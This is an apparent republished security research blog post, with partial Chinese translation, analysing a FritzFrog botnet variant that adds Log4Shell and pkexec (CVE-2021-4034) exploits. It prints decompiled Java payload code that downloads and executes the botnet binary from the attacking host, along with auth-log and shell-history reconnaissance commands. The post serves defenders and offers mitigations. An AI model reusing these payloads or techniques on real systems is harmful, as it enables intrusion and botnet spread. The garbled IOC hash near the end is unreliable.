Frog4Shell — FritzFrog Botnet Adds One-Days to Its Arsenal

Frog4Shell — FritzFrog Botnet Adds One-Days to Its Arsenal

Executive summary 执行摘要

  • The Akamai Security Intelligence Group (SIG) has uncovered details about a new variant of the FritzFrog botnet, which abuses the 2021 Log4Shell vulnerability.
    Akamai Security Intelligence Group(SIG)发现了关于FritzFrog僵尸网络新变种的详细信息,该变种滥用了2021 Log 4Shell漏洞。

  • Over the years we have seen more than 20,000 FritzFrog attacks, and 1,500+ victims.

  • The malware infects internet-facing servers by brute forcing weak SSH credentials. Newer variants now read several system files on compromised hosts to detect potential targets for this attack that have a high likelihood of being vulnerable.

  • The vulnerability is exploited in a brute-force manner that attempts to target as many vulnerable Java applications as possible.

  • The malware also now also includes a module to exploit CVE-2021-4034, a privilege escalation in the polkit Linux component. This module enables the malware to run as root on vulnerable servers.
    该恶意软件现在还包括一个利用CVE-2021-4034的模块,这是polkit Linux组件中的权限升级。该模块使恶意软件能够在易受攻击的服务器上以root身份运行。

  • We have included indicators of compromise (IOCs) and additional mitigation measures in this blog post to assist in the prevention of FritzFrog infection.

Background on FritzFrog 关于FritzFrog

Akamai is continuously monitoring threats via our global network of sensors, including threats we previously discovered. Among these is the FritzFrog botnet (originally identified in 2020) a sophisticated, Golang-based peer-to-peer botnet compiled to support both AMD- and ARM-based machines. The malware is actively maintained and has evolved over the years by adding and improving capabilities.

FritzFrog has traditionally hopped around by using SSH brute force, and has successfully compromised thousands of targets over the years as a result. Each compromised host becomes part of FritzFrog’s network — it communicates with its infected peers to share information, payloads, and configuration.

Thanks to the consistent upkeep, the malware includes many interesting features in its arsenal, including the additions we’ll discuss in this blog, such as the introduction of Log4Shell exploitation. For example, it attempts to avoid touching the disk to limit detection opportunities, supports communication over TOR, and even has an “AntiVirus” module that kills competing malware.

Using Log4Shell as an infection vector

Traditionally, FritzFrog relied on SSH brute force as its sole infection vector, but recent versions of the malware now include a new one: Log4Shell exploitation, which in our pond is known as the toadally rad “Frog4Shell”.
传统上,FritzFrog依赖SSH蛮力作为其唯一的感染媒介,但最近版本的恶意软件现在包括一个新的:Log4Shell利用,在我们的池塘中被称为toadally rad“Frog4Shell”。

The Log4Shell vulnerability was initially identified in December 2021 and triggered an industry-wide patching frenzy that lasted for months. Even today, 2 years later, there are many internet-facing applications that are still vulnerable to this exploit.

Vulnerable internet-facing assets are a serious problem, but FritzFrog actually poses a risk to an additional type of assets — internal hosts. When the vulnerability was first discovered, internet-facing applications were prioritized for patching because of their significant risk of compromise. Contrastly, internal machines, which were less likely to be exploited, were often neglected and remained unpatched — a circumstance that FritzFrog takes advantage of.

As part of its spreading routine, the malware attempts to target all hosts in the internal network. It does so by calling the net__Interface_Addrs standard Go function to identify reachable subnets and target the possible addresses in each of them. In Figure 1, we can see the malware attempting to connect to all the addresses in the local network.

Frog4Shell — FritzFrog Botnet Adds One-Days to Its ArsenalFig. 1: FritzFrog scanning the local network to identify targets

This means that even if the “high-profile” internet-facing applications have been patched, a breach of any asset in the network by FritzFrog can expose unpatched internal assets to exploitation.

FritzFrog identifies potential Log4Shell targets by looking for HTTP servers over ports 8080, 8090, 8888 and 9000. To trigger the vulnerability, an attacker needs to force the vulnerable log4j application to log data containing a payload (Table 1):


Table 1: Log4Shell payload example

This payload, which is incorrectly parsed by the vulnerable log4j library, forces the Java application to connect to an LDAP server specified in “attacker_address”, download a Java class from it, and execute it (Figure 2).

Frog4Shell — FritzFrog Botnet Adds One-Days to Its ArsenalFig. 2: The general Log4Shell exploitation flow

FritzFrog attempts to exploit this vulnerability by injecting the payload through HTTP headers (Figure 3). It does so in an interesting manner — rather than attempting to surgically target a specific HTTP header, FritzFrog targets pretty much all of them.

Frog4Shell — FritzFrog Botnet Adds One-Days to Its ArsenalFig. 3: FritzFrog Log4Shell exploit embedded inside various HTTP headers
图3:FritzFrog Log4Shell利用嵌入在各种HTTP头中

FritzFrog sends the Log4Shell payload in numerous HTTP headers, hoping that at least one of them gets logged by the application. This brute force exploitation approach aims to be a generic Log4Shell exploit that can affect a wide variety of applications.

The injected payload seen in Figure 3 makes the application connect back to FritzFrog’s own IP address — the malware hosts its own LDAP server that is used to serve the malicious Java class. Upon execution, the Java class will connect to the attacking machine over HTTP to download the malware binary that is hosted under the name “robots.txt” (Table 2).

String ff_host_http_server_address = ff_host_http_server_address.trim();
  payload_url = new URL("http://" + ff_host_http_server_address + "/" + 
  ff_username + "/robots.txt");
  payload_url_stream = payload_url.openStream();

Table 2: Decompiled Log4Shell Java payload downloading the FritzFrog binary
表2:下载FritzFrog二进制文件的反编译Log4Shell Java负载

The “robots.txt” file is saved under the name “ifconfig”. The Java class will then execute the ifconfig binary and delete the file (Table 3).

FileOutputStream ff_payload_file = new FileOutputStream(paths[counter] + "ifconfig");
  ff_payload_file_exec = new File(paths[counter] + "ifconfig");
  Process ff_proc = Runtime.getRuntime().exec(paths[counter] + "ifconfig init " + var9 + ":22 " + ff_username + " exploit_log4shell");
  if (ff_proc.waitFor() == 0) {

Table 3: Decompiled Log4Shell Java payload executing the FritzFrog binary
表3:执行FritzFrog二进制文件的反编译Log4Shell Java负载

Figure 4 illustrates the Log4Shell exploitation flow used by FritzFrog.

Frog4Shell — FritzFrog Botnet Adds One-Days to Its ArsenalFig. 4: FritzFrog Log4Shell exploit process
图4:FritzFrog Log4Shell漏洞利用过程

SSH target discovery methods

In addition to adding Log4Shell exploitation, FritzFrog also improved its ability to identify targets for its main infection vector — SSH brute force. While continuing to target randomly generated IP addresses, FritzFrog will now also attempt to identify specific SSH targets by enumerating several system logs on each of its victims.
除了添加Log 4Shell漏洞利用,FritzFrog还提高了识别其主要感染载体- SSH暴力攻击目标的能力。在继续瞄准随机生成的IP地址的同时,FritzFrog现在还将尝试通过列举每个受害者的几个系统日志来识别特定的SSH目标。

auth logs 验证日志

The Linux auth.log files contain, among other things, information about connections to the machine. FritzFrog targets active clients in the network by scanning these logs and looking for IP addresses. To access the data, the malware executes the following commands:
Linux auth.log文件包含与计算机连接有关的信息。FritzFrog通过扫描这些日志并查找IP地址来定位网络中的活动客户端。为了访问数据,恶意软件执行以下命令:

cat /var/log/auth*

zcat /var/log/auth*

These commands will output the content of all the cleartext and compressed log files.

SSH known hosts SSH已知主机

When a host connects to a remote SSH server, the connection information is automatically saved to the ~/.ssh/known_hosts file. FritzFrog will extract the addresses of these hosts and target them.

This provides the malware with a list of active and reachable SSH servers. Moreover, since these servers are likely managed by the same owner as the compromised server, they also may share a similar weak password.

History file 历史文件

All commands that are executed on Linux systems are saved in a special log called the history file. FritzFrog attempts to identify previous ssh and scp connections by executing the following command:

history | grep -E \”(scp|ssh)\”
历史|grep -E \”(scp| ssh)\”

FritzFrog will then extract the IP addresses from these commands and target them. Similar to the known_hosts file, this can provide a list of active and reachable SSH servers.

Privilege escalation 权限提升

Another change that we observed was the addition of a privilege escalation capability to the malware. On its initial execution, FritzFrog will check the permissions of its process. If the executing user is not root, a function called “main_RunBlasty” will be called (Figure 5).

Frog4Shell — FritzFrog Botnet Adds One-Days to Its ArsenalFig. 5: FritzFrog determines that the process is not running as root and executes the “main_RunBlasty” function

The “RunBlasty” function begins with the execution of the “which” command — a utility that enables locating the full path of other commands on the system (Figure 6).

Frog4Shell — FritzFrog Botnet Adds One-Days to Its ArsenalFig. 6: FritzFrog “which” command execution

We can see that the malware attempts to find the location of the pkexec binary. (Ring any vulnerability-related bells, aka vulneraBELLities?)

The malware then extracts two files that are embedded inside its own executable (Figure 7); the files are stored as strings, which are Base64-encoded gzipped files. The extracted files are called blasty and

Frog4Shell — FritzFrog Botnet Adds One-Days to Its ArsenalFig. 7: Extracting the files embedded in the malware binary

After creating the files, FritzFrog executes blasty — an ELF that was written in C. If we take a look at its code, we see that it is very simple — some interaction with environment variables, followed by the execution of pkexec (Figure 8).
创建文件后,FritzFrog执行blasty -一个用C编写的ELF。如果我们看一下它的代码,我们会发现它非常简单-与环境变量进行一些交互,然后执行pkexec(图8)。

Frog4Shell — FritzFrog Botnet Adds One-Days to Its ArsenalFig. 8: blasty disassembled code

Searching for these strings immediately leads us to this exploit code for CVE-2021-4034. This vulnerability in the polkit Linux component was disclosed by Qualys in 2022, and could allow privilege escalation on any Linux machine that was running polkit. Since it is installed by default on most Linux distributions, many unpatched machines are still vulnerable to this CVE today.
搜索这些字符串会立即将我们引向CVE-2021-4034的漏洞代码。Polkit Linux组件中的这个漏洞是由Qualys在2022年披露的,并且可以允许在任何运行polkit的Linux机器上进行权限升级。由于它默认安装在大多数Linux发行版上,许多未打补丁的机器今天仍然容易受到该CVE的攻击。

The exploit works by abusing the fact that pkexec is a SUID program; that is, it runs with root privileges even when executed by a weak user. The vulnerability enables forcing pkexec to load and execute an attacker-controlled library, leading to code execution as root.

Blasty exploits this vulnerability, making pkexec load and execute As we can see in Figure 9, this library will set the uid and gid of the process to 0, meaning root, and execute root_update — FritzFrog’s binary.
Blasty利用此漏洞,使pkexec加载并执行。正如我们在图9中看到的,这个库将把进程的uid和gid设置为0,表示root,并执行root_update – FritzFrog的二进制文件。

Frog4Shell — FritzFrog Botnet Adds One-Days to Its ArsenalFig. 9: executing FritzFrog as root

Another interesting note is that blasty and are both compiled for the AMD64 architecture, even for FritzFrog variants that run on ARM. This means that the exploit will fail to run on any machines that don’t run on an AMD64 CPU.
另一个有趣的注意是,blasty和payload.so都是为AMD 64架构编译的,即使是运行在ARM上的FritzFrog变体。这意味着该漏洞将无法在任何不运行在AMD 64 CPU上的机器上运行。

Defense evasion 防卫规避

FritzFrog continues to employ tactics to remain hidden and avoid detection. In particular, it takes special care to avoid dropping files to disk when possible. We have seen the developers use two Linux features to achieve this: /dev/shm and memfd_create.


The first technique uses the /dev/shm folder (with shm meaning shared memory), which is a directory that is meant to enable efficient communication among different processes on the system (Figure 10). While it seems like a normal filesystem folder, /dev/shm is actually mapped directly to the RAM, and all files created under it never actually touch the disk.

FritzFrog uses this folder to enable fileless execution by writing files and executing them from /dev/shm. To monitor this activity, we can execute the malware and use the inotifywait utility to inspect file operations in /dev/shm. We see that the malware writes several files to this directory; for example, in Figure 8 the malware is seen writing all the pkexec exploit files to /dev/shm before executing them.

Frog4Shell — FritzFrog Botnet Adds One-Days to Its ArsenalFig. 10: Monitoring FritzFrog file access events to the /dev/shm directory


The second technique uses the memfd_create function, described in the man page as follows:

memfd_create() creates an anonymous file and returns a file descriptor that refers to it. The file behaves like a regular file, and so can be modified, truncated, memory-mapped, and so on.  However, unlike a regular file, it lives in RAM.

So, similarly to the previous technique, we get a convenient way to create a file without touching the disk. FritzFrog uses this technique when executing its miner payload (Figure 11) — it writes the payload into an anonymous file created by memfd_create and executes it.

Frog4Shell — FritzFrog Botnet Adds One-Days to Its ArsenalFig. 11: FritzFrog using memfd_create to write the miner payload into an anonymous file

Mitigations 缓解措施

We recommend the following two mitigation strategies: using network segmentation and detecting the common malware tactics, techniques, and procedures.

  1. Network segmentation can limit the potential impact of FritzFrog by preventing lateral movement. Software-based segmentation can be a relatively simple solution to spin up that has a long-lasting defensive impact.

  2. We have provided a FritzFrog detection script to run on SSH servers that looks for the following FritzFrog indicators:

    a. Running processes named nginx, ifconfig, php-fpm, apache2, or libexec, whose executable file no longer exists on the file system (as seen below)
    a.运行名为nginx、ifconfig、php-fpm、apache 2或libexec的进程,其可执行文件在文件系统中已不存在(如下所示)

    b. Listening port 1234

Conclusion 结论

The shift in tactics toward exploitation was a major trend for threat actors in 2023 — one-day and zero-day exploits were used extensively and proved to be some of the most effective methods to breach into organizations.

FritzFrog’s addition of exploitation capabilities to its arsenal shows a similar shift in this direction. The additional infection vector that is abusing the Log4Shell vulnerability, and the pkexec exploit module are two additions explored in this blog post that exemplify this shift. We believe that this trend will continue in upcoming FritzFrog versions, and it’s likely only a matter of time before additional exploits are added to the malware.

The Akamai SIG will continue to monitor this threat and others like it and publish our findings. To keep up with FritzFrog updates and other security research, you can follow us on X (formerly Twitter).
Akamai SIG将继续监控此威胁和其他类似威胁,并发布我们的调查结果。为了跟上FritzFrog更新和其他安全研究,您可以在X(以前的Twitter)上关注我们。


FritzFrog Binary





Log4Shell payload Log4Shell有效负载

f50 f51 c601 bd 480102 fd 93894 b7274 fa 3d20915 eb 3af 44 f8 2015年b3月28日

“Blasty” pkexec exploit “爆炸性”pkexec漏洞利用

Blasty 布拉斯蒂



原文始发于Ori David:Frog4Shell — FritzFrog Botnet Adds One-Days to Its Arsenal

版权声明:admin 发表于 2024年2月6日 下午1:58。
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